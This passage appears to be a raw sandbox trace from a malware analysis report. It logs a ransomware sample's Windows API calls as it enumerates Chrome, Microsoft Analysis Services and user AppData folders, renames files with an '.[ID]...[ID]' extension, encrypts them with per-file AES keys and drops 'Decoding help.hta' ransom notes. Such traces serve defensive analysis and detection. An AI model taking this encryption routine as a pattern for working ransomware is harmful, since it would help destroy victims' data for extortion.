(x86)\\Google\\Chrome\\Application\\chrome.exe" [0042.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" [0042.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.498] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x64c [0042.499] CreateFileMappingA (hFile=0x64c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x654 [0042.499] CryptAcquireContextA (in: phProv=0x15adfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15adfcec*=0x3448ad8) returned 1 [0042.500] CryptGenKey (in: hProv=0x3448ad8, Algid=0x6610, dwFlags=0x1, phKey=0x15adfce8 | out: phKey=0x15adfce8*=0x671330) returned 1 [0042.500] CryptExportKey (in: hKey=0x671330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15adfbe4, pdwDataLen=0x15adfce4 | out: pbData=0x15adfbe4*, pdwDataLen=0x15adfce4*=0x2c) returned 1 [0042.500] MapViewOfFile (hFileMappingObject=0x654, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x21a50000 [0044.049] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x15adfbe4*, pdwDataLen=0x15adfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x15adfbe4*, pdwDataLen=0x15adfcf8*=0x100) returned 1 [0046.521] CryptEncrypt (in: hKey=0x671330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21a50000, pdwDataLen=0x15adfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x21a50000*, pdwDataLen=0x15adfce4*=0x100000) returned 1 [0048.180] UnmapViewOfFile (lpBaseAddress=0x21a50000) returned 1 [0048.351] CloseHandle (hObject=0x654) returned 1 [0048.351] CryptDestroyKey (hKey=0x671330) returned 1 [0049.196] CryptReleaseContext (hProv=0x3448ad8, dwFlags=0x0) returned 1 [0049.197] SetFilePointerEx (in: hFile=0x64c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.197] WriteFile (in: hFile=0x64c, lpBuffer=0x15adfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x15adfcf8, lpOverlapped=0x0 | out: lpBuffer=0x15adfbe4*, lpNumberOfBytesWritten=0x15adfcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.654] WriteFile (in: hFile=0x64c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x15adfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x15adfcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.654] CloseHandle (hObject=0x64c) returned 1 [0051.601] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.284] FindNextFileW (in: hFindFile=0x6712f0, lpFindFileData=0x15adfd30 | out: lpFindFileData=0x15adfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrome.VisualElementsManifest.xml", cAlternateFileName="CHROME~1.XML")) returned 1 [0055.284] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" [0055.284] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned 56 [0055.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta" [0055.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\decoding help.hta")) returned 0x1 [0055.285] lstrcmpiW (lpString1="Decoding help.hta", lpString2="chrome.VisualElementsManifest.xml") returned 1 [0055.285] lstrlenW (lpString="chrome.VisualElementsManifest.xml") returned 33 [0055.285] lstrcmpiW (lpString1="[ID]", lpString2=".xml") returned 1 [0055.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" [0055.285] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned 56 [0055.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\", lpString2="chrome.VisualElementsManifest.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" [0055.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" [0055.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0055.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcac [0058.528] CreateFileMappingA (hFile=0xcac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xcb0 [0058.528] CryptAcquireContextA (in: phProv=0x15adfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15adfcec*=0x10e27c68) returned 1 [0060.233] CryptGenKey (in: hProv=0x10e27c68, Algid=0x6610, dwFlags=0x1, phKey=0x15adfce8 | out: phKey=0x15adfce8*=0x10f14580) returned 1 [0060.233] CryptExportKey (in: hKey=0x10f14580, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15adfbe4, pdwDataLen=0x15adfce4 | out: pbData=0x15adfbe4*, pdwDataLen=0x15adfce4*=0x2c) returned 1 [0060.233] MapViewOfFile (hFileMappingObject=0xcb0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) Thread: id = 311 os_tid = 0x344 [0042.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*", lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671470 [0042.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.507] FindNextFileW (in: hFindFile=0x671470, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.507] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.507] FindNextFileW (in: hFindFile=0x671470, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0042.507] lstrcmpW (lpString1=".", lpString2="Cartridges") returned -1 [0042.507] lstrcmpW (lpString1="..", lpString2="Cartridges") returned -1 [0042.507] lstrcmpiW (lpString1="windows", lpString2="Cartridges") returned 1 [0042.624] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0042.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned 64 [0042.624] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\", lpString2="Cartridges" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" [0042.624] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0042.624] GlobalMemoryStatus (in: lpBuffer=0xbccfd10 | out: lpBuffer=0xbccfd10) [0042.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114e9258, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.630] CloseHandle (hObject=0x658) returned 1 [0042.630] FindNextFileW (in: hFindFile=0x671470, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0042.630] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0042.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned 64 [0042.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta" [0042.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\decoding help.hta")) returned 0xffffffff [0042.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0042.638] WriteFile (in: hFile=0x668, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xbccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xbccfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.639] CloseHandle (hObject=0x668) returned 1 [0042.639] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.640] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msmdlocal.dll") returned -1 [0042.640] lstrlenW (lpString="msmdlocal.dll") returned 13 [0042.640] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0042.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned 64 [0042.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\", lpString2="msmdlocal.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" [0042.640] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" [0042.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.640] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x65c [0042.656] CreateFileMappingA (hFile=0x65c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6d0 [0042.656] CryptAcquireContextA (in: phProv=0xbccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xbccfcec*=0x34489c8) returned 1 [0046.366] CryptGenKey (in: hProv=0x34489c8, Algid=0x6610, dwFlags=0x1, phKey=0xbccfce8 | out: phKey=0xbccfce8*=0x6714b0) returned 1 [0046.366] CryptExportKey (in: hKey=0x6714b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xbccfbe4, pdwDataLen=0xbccfce4 | out: pbData=0xbccfbe4*, pdwDataLen=0xbccfce4*=0x2c) returned 1 [0046.366] MapViewOfFile (hFileMappingObject=0x6d0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xb190000 [0046.402] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbccfbe4*, pdwDataLen=0xbccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xbccfbe4*, pdwDataLen=0xbccfcf8*=0x100) returned 1 [0046.402] CryptEncrypt (in: hKey=0x6714b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb190000, pdwDataLen=0xbccfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xb190000*, pdwDataLen=0xbccfce4*=0x100000) returned 1 [0047.418] UnmapViewOfFile (lpBaseAddress=0xb190000) returned 1 [0048.136] CloseHandle (hObject=0x6d0) returned 1 [0048.136] CryptDestroyKey (hKey=0x6714b0) returned 1 [0048.136] CryptReleaseContext (hProv=0x34489c8, dwFlags=0x0) returned 1 [0048.136] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.136] WriteFile (in: hFile=0x65c, lpBuffer=0xbccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xbccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xbccfbe4*, lpNumberOfBytesWritten=0xbccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.380] WriteFile (in: hFile=0x65c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xbccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xbccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.020] CloseHandle (hObject=0x65c) returned 1 [0059.232] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0062.800] FindNextFileW (in: hFindFile=0x671470, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 Thread: id = 312 os_tid = 0x244 [0042.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*", lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671430 [0042.506] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.506] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.506] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.506] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0042.506] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0042.506] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0042.506] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0042.592] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0042.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0042.592] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe" [0042.592] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*" [0042.592] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0042.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114d11f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0042.625] CloseHandle (hObject=0x6cc) returned 1 [0042.625] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0042.626] lstrcmpW (lpString1=".", lpString2="Application Data") returned -1 [0042.626] lstrcmpW (lpString1="..", lpString2="Application Data") returned -1 [0042.626] lstrcmpiW (lpString1="windows", lpString2="Application Data") returned 1 [0042.628] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0042.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0042.628] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Application Data" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data" [0042.628] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS 